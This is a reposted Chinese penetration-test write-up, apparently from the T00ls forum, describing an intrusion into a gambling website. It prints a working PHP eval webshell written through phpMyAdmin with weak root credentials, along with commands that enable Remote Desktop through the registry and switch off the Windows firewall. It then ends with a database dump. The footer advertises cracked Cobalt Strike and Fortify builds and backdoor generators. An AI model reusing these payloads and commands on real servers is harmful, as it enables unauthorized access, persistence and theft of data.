查看原文
其他

实战 | 关于一次弱口令的BC渗透

某种原因,接手了一个授权的bc站。


心是拒绝的,但是没办法,硬着头皮收下了。


其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了
但像我这种dd,只敢远观。


打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。



简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针



见到后台,废话不多说,直接弱口令套餐来一份


得到的结果肯定是  密码错误X1   密码错误X2   密码错误X3…………  


算了,不浪费时间了,看一下探针~  根据探针,得知网站的根目录。


底下有phpmyadmin的连接测试




直接弱口令再来一套,root  root    密码错误

Root 123456  密码错  唉   不对  好像是连接成功了


激动的留下了眼泪
根据探针,得知phpmyadmin的后台地址


Root 123456
登录


Phpmyadmin进来了,网站根目录也知道了,那还唠啥了,直接拿shell了


直接执行sql语句


select'<?php @eval($_POST[pass]);?>' into outfile 'D:/xxx/xxx/xxx.php'



一句话连接上,


Whoami  system …………  没意思啊,提权都不用了



通过查看服务器文件,得知后台登陆密码,登陆后台


因为个人喜好,比较喜欢用cs,powshell上线


读了一下密码,直接远程连接



但是


netstat -an  ,没开3389



开启3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


但是连接了一下,还是不行,用nmap扫描了一下端口,只有80端口开放
应该是开着防火墙


netsh firewall set opmode mode=disable  关闭防火墙



再连接3389   连接成功



根据浏览器历史记录,又发现另一个网站后台



到现在其实没啥了,直接数据库打包~完活上交。


作者:T00ls-Azjj98转载自:https://www.t00ls.net/articles-56653.html

扫码加好友,加入交流群↓↓↓ 

Taps:




免责声明:由于传播、利用本公众号WIN哥学安全提供的文章、工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号WIN哥学安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,本号会立即删除并致歉。谢谢!

往期精彩-安全工具

Redis漏洞利用工具

红队利器 | 阿波罗自动化攻击评估系统

Windows&Linux后门生成器

Burp专业版、Xray高级版、Ladon更新合集

基于ATT&CK攻击框架整理的红队工具

Fortify 22.2-Windows&Linux&Mac 破解版

漏扫工具Invicti-Professional(原Netsparker)

三款移动应用安全分析平台推荐

ONE-FOX单兵武器库贺岁版3.0

APP信息搜集工具--AppInfoScanner

【已更新】基于Win10搭建的渗透集成环境

溯源取证工具—攻击类型检测并自动导出报告

VMware 17.0 官方版+永久激活密钥

Docker_Awvs15.x一键安装[支持版本更新]

cobalt strike 4.7 破解版 cracked(附下载)

VMware vCenter漏洞综合利用Tools(附下载)

2022 年红队工具和模拟工具包

漏洞扫描工具,684个poc,支持mac,linux,win

Vxscan:一款用于渗透测试的多功能扫描工具

OAExploit一款基于OA产品的一键扫描工具

Android渗透工具(建议收藏)

HvvInfo资产探测和基本扫描的工具

【懒人神器,批量SRC】Serein,支持网站批量漏洞检测

往期精彩-渗透测试

图文详解多种漏洞配合利用--getshell(附脚本)

对某国能源打点(上)

技术分享:红队渗透测试项目之SickOs1.2

针对某集团的一次渗透测试

围观HW报告|打穿某国企下属企业

记一次某系统的渗透测试

红队-多层内网环境渗透测试

APP漏洞挖掘(一)某下载量超101万的APP可以GetShell

记一次简单渗透

往期精彩-漏洞研究

【漏洞复现】PHPStudy Web面板RCE漏洞

【漏洞速递】Clash最新远程代码执行漏洞(附POC)

SRC漏洞挖掘思路手法

用 Goby 通过反序列化漏洞一键打入内存马【利用篇】

【漏洞速递】禅道系统权限绕过与命令执行漏洞(附POC)

Android漏洞挖掘三板斧--drozer+Inspeckage(xosed)+MobSF

【漏洞复现 | 附EXP】CVE-2022-40684 & CVE-2022-22954

【漏洞情报速递】某塔面板疑似有未知漏洞

木马程序攻击+利用Windows内核漏洞提权

Webmin 漏洞 CVE-2022-0824复现

价值1500€的逻辑漏洞挖掘思路分享

某路由产品系统万能密码绕过漏洞复现

干货分享 | VMware vCenter漏洞实战利用总结

畅捷通任意文件上传漏洞(CNVD-2022-60632)复现

ThinkPHP6.0.12LTS反序列化(getshell的poc链挖掘)

往期精彩-红蓝对抗

围观HW报告|打穿某国企下属企业

地级市HVV | 未授权访问合集

攻防演练实战之梅开二度-致远OA-rce

一次市hvv及省hvv的思路总结

记一次攻防演练实战总结
2022年蓝队初级护网总结

大师傅,我想学习钓鱼研判!

【2022HVV系列】攻防演练中攻击方的思考

【2022HVV系列】实战攻防演习中的钓鱼攻击

蓝队的逆袭-蓝队防守流程&溯源与反制

【2022HVV系列】蓝队手册更新版(建议收藏)

【2022HVV系列】任意文件上传漏洞应急响应

【2022HVV系列】溯源反制案例(建议收藏)

【2022HVV系列】一次溯源过程复盘

【2022HVV系列】1-应急响应之入侵排查

【2022HVV系列】挖矿病毒应急响应

【2022HVV系列】红蓝对抗以及护网相关工具和资料

【2022HVV系列】操作系统日志收集与分析

【2022HVV系列】一次真实应急响应复盘

往期精彩-安全运营

企业级-应急响应完整流程:启示录1

应急响应思维导图分享-mir1ce师傅

最全应急响应流程-附命令和工具【建议收藏】

干货 | 冰蝎、哥斯拉 内存马应急排查方式汇总

开源蜜罐Hfish的简单部署并接入到GrayLog

构造溯源蜜罐——伪造MySQL服务端

实战某高校的一次挖矿病毒的应急处置

网络安全风险收敛与安全加固实战经验

一款web服务日志管理、流量可视化监控工具

往期精彩-安全知识

【保姆级教学】Redis常见利用方法

干货丨渗透测试常用方法总结,大神之笔!

[ 红队知识库 ] 常见WAF拦截页面

sql server提权总结

关于webshell免杀的应用思路

【Github搬砖】网络安全学习wiki

Cobalt strike 环境搭建与基本功能

Redis未授权漏洞蜜罐模拟与捕获分析

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存